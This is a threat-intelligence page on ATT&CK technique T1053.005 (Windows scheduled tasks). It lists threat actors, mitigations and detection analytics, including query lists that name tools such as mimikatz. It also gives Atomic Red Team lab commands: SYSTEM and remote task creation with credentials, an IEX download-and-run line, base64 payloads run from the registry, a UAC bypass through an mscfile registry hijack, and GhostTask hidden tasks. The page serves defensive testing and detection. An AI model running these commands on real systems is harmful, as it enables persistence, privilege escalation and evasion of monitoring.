Home/ATT&CK Technique/Scheduled Task
ATT&CK Technique

Scheduled Task

T1053.005 · execution, persistence, privilege-escalation

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel.

In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet Invoke-CimMethod, which leverages WMI class PS_ScheduledTask to create a scheduled task via an XML path. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence.

The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to System Binary Proxy Execution, adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes. Adversaries may also create "hidden" scheduled tasks (i.e.

Hide Artifacts) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions). Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys.

Windows

Actors Using This

14
iranAgrius
russia_speaking_cybercrimeAkira
russia_speaking_cybercrimeALPHV / BlackCat
north_koreaAndariel
franceAnimal Farm
unknown_likely_russia_alignedAnubis Ransomware
chinaAoqin Dragon
chinaAPT10
chinaAPT17
chinaAPT1
russiaAPT29
chinaAPT31
iranAPT33
iranOilRig

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
resource-development earlier
T1584.006 · Web Services ×1.22T1588.003 · Code Signing Certificates ×1.22
initial-access earlier
T0822 · External Remote Services ×1.22T1195.001 · Compromise Software Dependencies and Development Tools ×1.22
execution same
T1053.003 · Cron ×1.22T1574.006 · Dynamic Linker Hijacking ×1.22
privilege-escalation later
T1055.001 · Dynamic-link Library Injection ×1.22T1546.001 · Change Default File Association ×1.22T1546.011 · Application Shimming ×1.22
impact later
T0879 · Damage to Property ×1.22
other same
T1027.010 · Command Obfuscation ×1.22T1480 · Execution Guardrails ×1.22T1218.010 · Regsvr32 ×1.22T1480.001 · Environmental Keying ×1.22T1218.001 · Compiled HTML File ×1.22

Atomic Tests

12
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptelevatedwindowsScheduled Task Startup Script
Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. 
schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"
command_promptwindowsScheduled task Local
Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. 
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
command_promptelevatedwindowsScheduled task Remote
Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. 
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
powershellwindowsPowershell Cmdlet Scheduled Task
Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. 
$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object
powershellwindowsTask Scheduler via VBA
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run 
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
powershellelevatedwindowsWMI Invoke-CimMethod Scheduled Task
Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. 
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
command_promptwindowsScheduled Task Executing Base64 Encoded Commands From Registry
A Base64 Encoded command will be stored in the registry (ping 127.0.0.1) and then a scheduled task will be created. The scheduled task will launch powershell to decode and run the command in the registry daily. This is a persistence mechanism recently seen in use by Qakbot. [Additiona Information](https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/) 
reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f
schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st #{time}
powershellelevatedwindowsImport XML Schedule Task with Hidden Attribute
Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2. 
$xml = [System.IO.File]::ReadAllText("#{xml_path}")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
powershellwindowsPowerShell Modify A Scheduled Task
Create a scheduled task with an action and modify the action to do something else. The initial idea is to showcase Microsoft Windows TaskScheduler Operational log modification of an action on a Task already registered. It will first be created to spawn cmd.exe, but modified to run notepad.exe. Upon successful execution, powershell.exe will create a scheduled task and modify the action. 
$Action = New-ScheduledTaskAction -Execute "cmd.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTaskModifed -InputObject $object
$NewAction = New-ScheduledTaskAction -Execute "Notepad.exe"
Set-ScheduledTask "AtomicTaskModifed" -Action $NewAction
command_promptelevatedwindowsScheduled Task ("Ghost Task") via Registry Key Manipulation
Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means. This requires a download of the GhostTask binary, which must be run as NT Authority\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command. For further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78). 
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" \\#{target} -accepteula -s "cmd.exe"
"PathToAtomicsFolder\..\ExternalPayloads\GhostTask.exe" \\#{target} add #{task_name} "cmd.exe" "/c #{task_command}" #{user_name} logon
command_promptelevatedwindowsScheduled Task Persistence via CompMgmt.msc
Adds persistence by abusing `compmgmt.msc` via a scheduled task. When the Computer Management console is opened, it will run a malicious payload (in this case, `calc.exe`). This technique abuses scheduled tasks and registry modifications to hijack legitimate system processes. 
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "compmgmt.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's open the Computer Management console now...
compmgmt.msc
command_promptelevatedwindowsScheduled Task Persistence via Eventviewer.msc
Adds persistence by abusing `eventviewer.msc` via a scheduled task. When the eventviewer console is opened, it will run a malicious payload (in this case, `calc.exe`). 
reg add "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "c:\windows\System32\#{payload}" /f
schtasks /Create /TN "#{task_name}" /TR "eventvwr.msc" /SC ONLOGON /RL HIGHEST /F
ECHO Let's run the schedule task ...
schtasks /Run /TN "EventViewerBypass"

Mitigations

4
MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.
M1018User Account Management

User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies.

Enforcing the Principle of Least Privilege
  • Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.
  • Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions. Implementing Strong Password Policies.
  • Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.
  • Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks. Managing Dormant and Orphaned Accounts.
  • Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.
  • Use Case: Eliminates dormant accounts that could be exploited by attackers. Account Lockout Policies.
  • Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.
  • Use Case: Mitigates automated attack techniques that rely on repeated login attempts. Multi-Factor Authentication (MFA) for High-Risk Accounts.
  • Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.
  • Use Case: Prevents unauthorized access, even if credentials are stolen. Restricting Interactive Logins.
  • Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.
  • Use Case: Protects sensitive accounts from misuse or exploitation.
Tools for Implementation Built-in Tools
  • Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.
  • Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.
Identity and Access Management (IAM) Tools
  • Okta: Centralized user provisioning, MFA, and SSO integration.
  • Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.
Privileged Account Management (PAM)
  • CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access.
M1026Privileged Account Management

Privileged Account Management focuses on implementing policies, controls, and tools to securely manage privileged accounts (e.g., SYSTEM, root, or administrative accounts). This includes restricting access, limiting the scope of permissions, monitoring privileged account usage, and ensuring accountability through logging and auditing.

Account Permissions and Roles
  • Implement RBAC and least privilege principles to allocate permissions securely.
  • Use tools like Active Directory Group Policies to enforce access restrictions.
Credential Security
  • Deploy password vaulting tools like CyberArk, HashiCorp Vault, or KeePass for secure storage and rotation of credentials.
  • Enforce password policies for complexity, uniqueness, and expiration using tools like Microsoft Group Policy Objects (GPO).
Multi-Factor Authentication (MFA)
  • Enforce MFA for all privileged accounts using Duo Security, Okta, or Microsoft Azure AD MFA.
Privileged Access Management (PAM)
  • Use PAM solutions like CyberArk, BeyondTrust, or Thycotic to manage, monitor, and audit privileged access.
Auditing and Monitoring
  • Integrate activity monitoring into your SIEM (e.g., Splunk or QRadar) to detect and alert on anomalous privileged account usage.
Just-In-Time Access
  • Deploy JIT solutions like Azure Privileged Identity Management (PIM) or configure ephemeral roles in AWS and GCP to grant time-limited elevated permissions.
Tools for Implementation Privileged Access Management (PAM)
  • CyberArk, BeyondTrust, Thycotic, HashiCorp Vault.
Credential Management
  • Microsoft LAPS (Local Admin Password Solution), Password Safe, HashiCorp Vault, KeePass.
Multi-Factor Authentication
  • Duo Security, Okta, Microsoft Azure MFA, Google Authenticator.
Linux Privilege Management
  • sudo configuration, SELinux, AppArmor.
Just-In-Time Access
  • Azure Privileged Identity Management (PIM), AWS IAM Roles with session constraints, GCP Identity-Aware Proxy.
M1028Operating System Configuration

Operating System Configuration involves adjusting system settings and hardening the default configurations of an operating system (OS) to mitigate adversary exploitation and prevent abuse of system functionality. Proper OS configurations address security vulnerabilities, limit attack surfaces, and ensure robust defense against a wide range of techniques.

Disable Unused Features
  • Turn off SMBv1, LLMNR, and NetBIOS where not needed.
  • Disable remote registry and unnecessary services.
Enforce OS-level Protections
  • Enable Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Control Flow Guard (CFG) on Windows.
  • Use AppArmor or SELinux on Linux for mandatory access controls.
Secure Access Settings
  • Enable User Account Control (UAC) for Windows.
  • Restrict root/sudo access on Linux/macOS and enforce strong permissions using sudoers files.
File System Hardening
  • Implement least-privilege access for critical files and system directories.
  • Audit permissions regularly using tools like icacls (Windows) or getfacl/chmod (Linux/macOS).
Secure Remote Access
  • Restrict RDP, SSH, and VNC to authorized IPs using firewall rules.
  • Enable NLA for RDP and enforce strong password/lockout policies.
Harden Boot Configurations
  • Enable Secure Boot and enforce UEFI/BIOS password protection.
  • Use BitLocker or LUKS to encrypt boot drives.
Regular Audits
  • Periodically audit OS configurations using tools like CIS Benchmarks or SCAP tools.
Tools for Implementation Windows
  • Microsoft Group Policy Objects (GPO): Centrally enforce OS security settings.
  • Windows Defender Exploit Guard: Built-in OS protection against exploits.
  • CIS-CAT Pro: Audit Windows security configurations based on CIS Benchmarks.
Linux/macOS
  • AppArmor/SELinux: Enforce mandatory access controls.
  • Lynis: Perform comprehensive security audits.
  • SCAP Security Guide: Automate configuration hardening using Security Content Automation Protocol.
Cross-Platform
  • Ansible or Chef/Puppet: Automate configuration hardening at scale.
  • OpenSCAP: Perform compliance and configuration checks.
M1047Audit

Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements.

The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures. Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.

System Audit
  • Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
  • Implementation: Use tools to scan for deviations from established benchmarks.
Permission Audits
  • Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
  • Implementation: Run access reviews to identify users or groups with excessive permissions.
Software Audits
  • Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
  • Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.
Configuration Audits
  • Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
  • Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.
Network Audits
  • Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
  • Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior.

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 31
Analytics (MITRE CAR) 6
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

CAR Analytics

6
MITRE Cyber Analytics Repository - field-tested detection logic for this technique, written as pseudocode/queries you adapt to your own SIEM (Splunk, Sentinel, EQL). Each is a ready starting point for a detection rule, not just a description.
CAR-2013-01-002Moderate coverageAutorun Differences

The Sysinternals tool [Autoruns](../sensors/autoruns) checks the registry and file system for known identify persistence mechanisms. It will output any tools identified, including built-in or added-on Microsoft functionality and third party software. Many of these locations are known by adversaries and used to obtain Persistence.

Running Autoruns periodically in an environment makes it possible to collect and monitor its output for differences, which may include the removal or addition of persistent tools. Depending on the persistence mechanism and location, legitimate software may be more likely to make changes than an adversary tool. Thus, this analytic may result in significant noise in a highly dynamic environment.

While Autoruns is a convenient method to scan for programs using persistence mechanisms its scanning nature does not conform well to streaming based analytics. This analytic could be replaced with one that draws from sensors that collect registry and file information if streaming analytics are desired. Utilizes the Sysinternals autoruns tool (ignoring validated Microsoft entries).

Primarily not a detection analytic by itself but through analysis of results by an analyst can be used for such. Building another analytic on top of this one identifying unusual entries would likely be a beneficial alternative.

CAR-2013-04-002Low coverageQuick execution of a series of suspicious commands

Certain commands are frequently used by malicious actors and infrequently used by normal users. By looking for execution of these commands in short periods of time, we can not only see when a malicious user was on the system but also get an idea of what they were doing.

Commands of interest
  • arp.exe.
  • at.exe.
  • attrib.exe.
  • cscript.exe.
  • dsquery.exe.
  • hostname.exe.
  • ipconfig.exe.
  • mimikatz.exe.
  • nbstat.exe.
  • net.exe.
  • netsh.exe.
  • nslookup.exe.
  • ping.exe.
  • quser.exe.
  • qwinsta.exe.
  • reg.exe.
  • runas.exe.
  • sc.exe.
  • schtasks.exe.
  • ssh.exe.
  • systeminfo.exe.
  • taskkill.exe.
  • telnet.exe.
  • tracert.exe.
  • wscript.exe.
  • xcopy.exe ### Output Description The host on which the commands were executed, the time of execution, and what commands were executed.
pseudocode
processes = search Process:Create
reg_processes = filter processes where (exe == "arp.exe" or exe == "at.exe" or exe == "attrib.exe"
 or exe == "cscript.exe" or exe == "dsquery.exe" or exe == "hostname.exe"
 or exe == "ipconfig.exe" or exe == "mimikatz.exe" or exe == "nbstat.exe"
 or exe == "net.exe" or exe == "netsh.exe" or exe == "nslookup.exe"
 or exe == "ping.exe" or exe == "quser.exe" or exe == "qwinsta.exe"
 or exe == "reg.exe" or exe == "runas.exe" or exe == "sc.exe"
 or exe == "schtasks.exe" or exe == "ssh.exe" or exe == "systeminfo.exe"
 or exe == "taskkill.exe" or exe == "telnet.exe" or exe == "tracert.exe"
 or exe == "wscript.exe" or exe == "xcopy.exe")
reg_grouped = group reg by hostname, ppid where(max time between two events is 30 minutes)
output reg_grouped
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $App=regex(arp\.exe|at\.exe|attrib\.exe|cscript\.exe|dsquery\.exe|hostname\.exe|ipconfig\.exe|mimikatz.exe|nbstat\.exe|net\.exe|netsh\.exe|nslookup\.exe|ping\.exe|quser\.exe|qwinsta\.exe|reg\.exe|runas\.exe|sc\.exe|schtasks\.exe|ssh\.exe|systeminfo\.exe|taskkill\.exe|telnet\.exe|tracert\.exe|wscript\.exe|xcopy\.exe)i group count_unique $App limit 100
>>_agg count
>>_checkif int_compare Count > 1 include
LogPoint
norm_id=WindowsSysmon event_id=1 image IN ["*\arp.exe", "*\at.exe", "*\attrib.exe", "*\cscript.exe", "*\dsquery.exe", "*\hostname.exe", "*\ipconfig.exe", "*\mimikatz.exe", "*\nbstat.exe", "*\net.exe", "*\netsh.exe", "*\nslookup.exe", "*\ping.exe", "*\quser.exe", "*\qwinsta.exe", "*\reg.exe", "*\runas.exe", "*\sc.exe", "*\schtasks.exe", "*\ssh.exe", "*\systeminfo.exe", "*\taskkill.exe", "*\telnet.exe", "*\tracert.exe", "*\wscript.exe", "*\xcopy.exe"]
| chart count() as cnt by host
| search cnt > 1
CAR-2013-08-001Moderate coverageExecution with schtasks

The Windows built-in tool schtasks.exe provides the creation, modification, and running of scheduled tasks on a local or remote computer. It is provided as a more flexible alternative to at.exe, described in [CAR-2013-05-004](../CAR-2013-05-004). Although used by adversaries, the tool is also legitimately used by administrators, scripts, and software configurations.

The scheduled tasks tool can be used to gain Persistence and can be used in combination with a Lateral Movement technique to remotely gain execution. Additionally, the command has parameters to specify the user and password responsible for creating the task, as well as the user and password combination that the task will run as. The /s flag specifies the remote system on which the task should be scheduled, usually indicating Lateral Movement.

pseudocode
process = search Process:Create
schtasks = filter process where (exe == "schtasks.exe")
output schtasks
DNIF
_fetch * from event where $LogName=WINDOWS-SYSMON AND $EventID=1 AND $App=schtasks.exe AND $Process=regex(.*(\/create|\/run|\/query|\/delete|\/change|\/end).*)i limit 100
LogPoint
norm_id=WindowsSysmon event_id=1 image="*\schtasks.exe" command IN ["*/create*", "*/run*", "*/query*", "*/delete*", "*/change*", "*/end*"]
CAR-2015-04-002Moderate coverageRemotely Scheduled Tasks via Schtasks

An adversary can move laterally using the schtasks command to remotely schedule tasks/jobs. Although these events can be detected with command line analytics [CAR-2013-08-001](../CAR-2013-08-001), it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as PowerShell. In this cases, an additional source of data becomes necessary to detect adversarial behavior.

When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established ([CAR-2014-05-001](../CAR-2014-05-001)), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.

Certain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats
  • UUID 86d35949-83c9-4044-b424-db363231fd0c (decoded)
  • Hex 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c (raw)
  • ASCII IYD@$621 (printable bytes only) This identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.
pseudocode
flows = search Flow:Message
schtasks_rpc = filter flows where (
 src_port >= 49152 and dest_port >= 49152 and
 proto_info.rpc_interface == "ITaskSchedulerService"
)

output schtasks_rpc
CAR-2020-09-001Low coverageScheduled Task - FileAccess

In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host.

Task Scheduler stores tasks as files in two locations
  • C:\Windows\Tasks (legacy) or C:\Windows\System32\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.
Pseudocode - Pseudocode - Windows task file creation
files = search File:Create
task_files = filter files where (
  (file_path = "C:\Windows\System32\Tasks\*" or file_path = "C:\Windows\Tasks\*")  and
  image_path != "C:\WINDOWS\system32\svchost.exe")
output task_files
Splunk - Splunk search - Windows task file creation
index=__your_sysmon_index__ EventCode=11 Image!="C:\\WINDOWS\\system32\\svchost.exe" (TargetFilename="C:\\Windows\\System32\\Tasks\\
*" OR TargetFilename="C:\\Windows\\Tasks\\*")
LogPoint - LogPoint search - Windows task file creation
norm_id=WindowsSysmon event_id=11 -source_image="C:\WINDOWS\system32\svchost.exe" (path="C:\Windows\System32\Tasks*" OR path="C:\Windows\Tasks*")
CAR-2021-12-001Medium coverageScheduled Task Creation or Modification Containing Suspicious Scripts, Extensions or User Writable Paths

Detection of the creation or modification of Scheduled Tasks with a suspicious script, extension or user writable path. Attackers may create or modify Scheduled Tasks for the persistent execution of malicious code. This detection focuses at the same time on EventIDs 4688 and 1 with process creation (SCHTASKS) and EventID 4698, 4702 for Scheduled Task creation/modification event log.

Pseudocode - Creation of Suspicious Scheduled Tasks
processes = search Process:create
susp_tasks_processes = filter processes where command_line CONTAINS("*SCHTASKS*") AND (command_line CONTAINS("*/CREATE*") OR command_line CONTAINS("*/CHANGE*")) AND (command_line CONTAINS("*.cmd*") OR command_line CONTAINS("*.ps1*") OR command_line CONTAINS("*.vbs*") OR command_line CONTAINS("*.py*") OR command_line CONTAINS("*.js*") OR command_line CONTAINS("*.exe*") OR command_line CONTAINS("*.bat*") OR (command_line CONTAINS("*javascript*") OR command_line CONTAINS("*powershell*") OR command_line CONTAINS("*wmic*") OR command_line CONTAINS("*rundll32*") OR command_line CONTAINS("*cmd*") OR command_line CONTAINS("*cscript*") OR command_line CONTAINS("*wscript*") OR command_line CONTAINS("*regsvr32*") OR command_line CONTAINS("*mshta*") OR command_line CONTAINS("*bitsadmin*") OR command_line CONTAINS("*certutil*") OR command_line CONTAINS("*msiexec*") OR command_line CONTAINS("*javaw*") OR (command_line CONTAINS("*%APPDATA%*") OR command_line CONTAINS("*\\AppData\\Roaming*") OR command_line CONTAINS("*%PUBLIC%*") OR command_line CONTAINS("*C:\\Users\\Public*") OR command_line CONTAINS("*%ProgramData%*") OR command_line CONTAINS("*C:\\ProgramData*") OR command_line CONTAINS("*%TEMP%*") OR command_line CONTAINS("*\\AppData\\Local\\Temp*") OR command_line CONTAINS("*\\Windows\\PLA\\System*") OR command_line CONTAINS("*\\tasks*") OR command_line CONTAINS("*\\Registration\\CRMLog*") OR command_line CONTAINS("*\\FxsTmp*") OR command_line CONTAINS("*\\spool\\drivers\\color*") OR command_line CONTAINS("*\\tracing*"))))
tasks = search Task:create
susp_tasks = filter tasks where (task_content CONTAINS("*.cmd*") OR task_content CONTAINS("*.ps1*") OR task_content CONTAINS("*.vbs*") OR task_content CONTAINS("*.py*") OR task_content CONTAINS("*.js*") OR task_content CONTAINS("*.exe*") OR task_content CONTAINS("*.bat*") OR (task_content CONTAINS("*javascript*") OR task_content CONTAINS("*powershell*") OR task_content CONTAINS("*wmic*") OR task_content CONTAINS("*rundll32*") OR task_content CONTAINS("*cmd*") OR task_content CONTAINS("*cscript*") OR task_content CONTAINS("*wscript*") OR task_content CONTAINS("*regsvr32*") OR task_content CONTAINS("*mshta*") OR task_content CONTAINS("*bitsadmin*") OR task_content CONTAINS("*certutil*") OR task_content CONTAINS("*msiexec*") OR task_content CONTAINS("*javaw*") OR (task_content CONTAINS("*%APPDATA%*") OR task_content CONTAINS("*\\AppData\\Roaming*") OR task_content CONTAINS("*%PUBLIC%*") OR task_content CONTAINS("*C:\\Users\\Public*") OR task_content CONTAINS("*%ProgramData%*") OR task_content CONTAINS("*C:\\ProgramData*") OR task_content CONTAINS("*%TEMP%*") OR task_content CONTAINS("*\\AppData\\Local\\Temp*") OR task_content CONTAINS("*\\Windows\\PLA\\System*") OR task_content CONTAINS("*\\tasks*") OR task_content CONTAINS("*\\Registration\\CRMLog*") OR task_content CONTAINS("*\\FxsTmp*") OR task_content CONTAINS("*\\spool\\drivers\\color*") OR task_content CONTAINS("*\\tracing*"))))
output susp_tasks_processes, susp_tasks
Splunk - Splunk Search - Scheduled Task creation or modification containing suspicious script, extension or user writable path.
(((EventCode="4688" OR EventCode="1") CommandLine="*SCHTASKS*" (CommandLine="*/CREATE*" OR CommandLine="*/CHANGE*")) ((CommandLine="*.cmd*" OR CommandLine="*.ps1*" OR CommandLine="*.vbs*" OR CommandLine="*.py*" OR CommandLine="*.js*" OR CommandLine="*.exe*" OR CommandLine="*.bat*") OR (CommandLine="*javascript*" OR CommandLine="*powershell*" OR CommandLine="*wmic*" OR CommandLine="*rundll32*" OR CommandLine="*cmd*" OR CommandLine="*cscript*" OR CommandLine="*wscript*" OR CommandLine="*regsvr32*" OR CommandLine="*mshta*" OR CommandLine="*bitsadmin*" OR CommandLine="*certutil*" OR CommandLine="*msiexec*" OR CommandLine="*javaw*") OR (CommandLine="*%APPDATA%*" OR CommandLine="*\\AppData\\Roaming*" OR CommandLine="*%PUBLIC%*" OR CommandLine="*C:\\Users\\Public*" OR CommandLine="*%ProgramData%*" OR CommandLine="*C:\\ProgramData*" OR CommandLine="*%TEMP%*" OR CommandLine="*\\AppData\\Local\\Temp*" OR CommandLine="*\\Windows\\PLA\\System*" OR CommandLine="*\\tasks*" OR CommandLine="*\\Registration\\CRMLog*" OR CommandLine="*\\FxsTmp*" OR CommandLine="*\\spool\\drivers\\color*" OR CommandLine="*\\tracing*"))) OR ((EventCode="4698" OR EventCode="4702") ((TaskContent="*.cmd*" OR TaskContent="*.ps1*" OR TaskContent="*.vbs*" OR TaskContent="*.py*" OR TaskContent="*.js*" OR TaskContent="*.exe*" OR TaskContent="*.bat*") OR (TaskContent="*javascript*" OR TaskContent="*powershell*" OR TaskContent="*wmic*" OR TaskContent="*rundll32*" OR TaskContent="*cmd*" OR TaskContent="*cscript*" OR TaskContent="*wscript*" OR TaskContent="*regsvr32*" OR TaskContent="*mshta*" OR TaskContent="*bitsadmin*" OR TaskContent="*certutil*" OR TaskContent="*msiexec*" OR TaskContent="*javaw*") OR (TaskContent="*%APPDATA%*" OR TaskContent="*\\AppData\\Roaming*" OR TaskContent="*%PUBLIC%*" OR TaskContent="*C:\\Users\\Public*" OR TaskContent="*%ProgramData%*" OR TaskContent="*C:\\ProgramData*" OR TaskContent="*%TEMP%*" OR TaskContent="*\\AppData\\Local\\Temp*" OR TaskContent="*\\Windows\\PLA\\System*" OR TaskContent="*\\tasks*" OR TaskContent="*\\Registration\\CRMLog*" OR TaskContent="*\\FxsTmp*" OR TaskContent="*\\spool\\drivers\\color*" OR TaskContent="*\\tracing*")))
Elastic - Elastic Search - Scheduled Task creation or modification containing suspicious script, extension or user writable path.
